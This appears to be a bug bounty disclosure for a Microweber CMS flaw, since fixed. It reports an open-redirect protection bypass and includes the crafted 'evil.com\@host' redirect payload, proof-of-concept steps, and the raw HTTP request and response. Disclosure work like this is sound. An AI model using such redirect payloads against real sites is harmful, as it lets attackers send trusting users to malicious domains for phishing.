Bypass open redirect protection in microweber/microweber

Valid

Reported on

Jun 28th 2022


Description

I could bypass the open redirect protection on the application after parsing the redirect function using the following payload http://evil.com\@192.168.61.130/ and the payload with the link in the following

http://192.168.61.130/test/microweber-master/logout?redirect_to=http://evil.com\@192.168.61.130/

note that the ip 192.168.61.130 is my local server which runs the CMS.

Proof of Concept

  1. login to your account
  2. open the link with the payload http://192.168.61.130/test/microweber-master/logout?redirect_to=http://evil.com\@192.168.61.130/
  3. click on Confirm and you will be redirected to evil.com

The following is the request from the page

POST /test/microweber-master/logout HTTP/1.1
Host: 192.168.61.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 104
Origin: http://192.168.61.130
Connection: close
Referer: http://192.168.61.130/test/microweber-master/logout?redirect_to=http://evil.com\@192.168.61.130/
Cookie: .....
Upgrade-Insecure-Requests: 1

_token=B6N4HwCIWdTfZ8pjaESZSnmA5F7WTKoC8YphlVc9&redirect_to=http%3A%2F%2Fevil.com%5C%40192.168.61.130%2F

The response is the following

HTTP/1.1 302 Found
Date: Tue, 28 Jun 2022 13:13:22 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Cache-Control: no-cache, private
Location: http://evil.com\@192.168.61.130/
Set-Cookie: .....path=/; httponly; samesite=lax
Content-Length: 374
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <meta http-equiv="refresh" content="0;url='http://evil.com\@192.168.61.130/'" />

        <title>Redirecting to http://evil.com\@192.168.61.130/</title>
    </head>
    <body>
        Redirecting to <a href="http://evil.com\@192.168.61.130/">http://evil.com\@192.168.61.130/</a>.
    </body>
</html>

you can notice the Location header is redirecting to evil.com

Impact

redirecting the users to other domains via the CMS trusted domain.

We are processing your report and will contact the microweber team within 24 hours. a month ago
We have contacted a member of the microweber team and are waiting to hear back a month ago
Peter Ivanov validated this vulnerability a month ago
Mohamed Sayed has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov confirmed that a fix has been merged on 187e94 a month ago
Peter Ivanov has been awarded the fix bounty
to join this conversation